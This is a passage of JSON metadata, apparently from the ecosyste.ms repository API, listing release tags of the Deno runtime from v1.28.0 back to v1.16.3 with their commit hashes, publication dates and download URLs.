itHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.